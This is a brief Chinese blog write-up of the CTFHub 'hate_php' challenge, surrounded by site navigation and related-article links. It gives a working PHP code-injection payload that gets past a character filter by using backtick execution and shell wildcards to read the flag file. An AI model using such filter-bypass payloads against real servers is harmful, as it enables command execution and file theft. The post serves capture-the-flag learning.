技术栈

CTFHub-hate_php

九尾w2024-11-18 23:45

点开链接,有源码

过滤了_ $ @

不能用定义变量的做法

用取反操作,发现环境限制,也不行

利用通配符来匹配文件路径

/bin/cat flag

?code=?><?=`/???/??? /????`?>

划到最下面

上一篇:开源 - Ideal库 - 枚举扩展设计思路及实现难点(三)
下一篇:Mongodb
相关推荐
迎仔
27 分钟前
05-AI与网络安全
人工智能·安全·web安全
临水逸
2 小时前
一次路径穿越漏洞引发的NAS安全危机:飞牛fnOS漏洞深度剖析与用户自救指南
网络·安全·web安全
JMchen123
2 小时前
Android网络安全实战:从HTTPS到双向认证
android·经验分享·网络协议·安全·web安全·https·kotlin
hzb66666
3 小时前
unictf2026
开发语言·javascript·安全·web安全·php
Binary-Jeff
9 小时前
一文读懂 HTTPS 协议及其工作流程
网络协议·web安全·http·https
lingggggaaaa
14 小时前
安全工具篇&动态绕过&DumpLsass凭据&Certutil下载&变异替换&打乱源头特征
学习·安全·web安全·免杀对抗
介一安全
15 小时前
【Web安全】XML注入全手法拆解
xml·web安全·安全性测试
QT.qtqtqtqtqt
15 小时前
未授权访问漏洞
网络·安全·web安全
ShoreKiten
16 小时前
ctfshowweb359-360
web安全·ssrf
ba_pi
18 小时前
每天写点什么2026-02-04(2.1)信息安全
安全·web安全
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03UV安装并设置国内源04openclaw配置教程(linux+局域网ollama)05OpenClaw Chrome扩展使用教程 - 浏览器中继控制06Linux下V2Ray安装配置指南07AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南08Claude Code Skills 实用使用手册09Vue-skills的中文文档10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南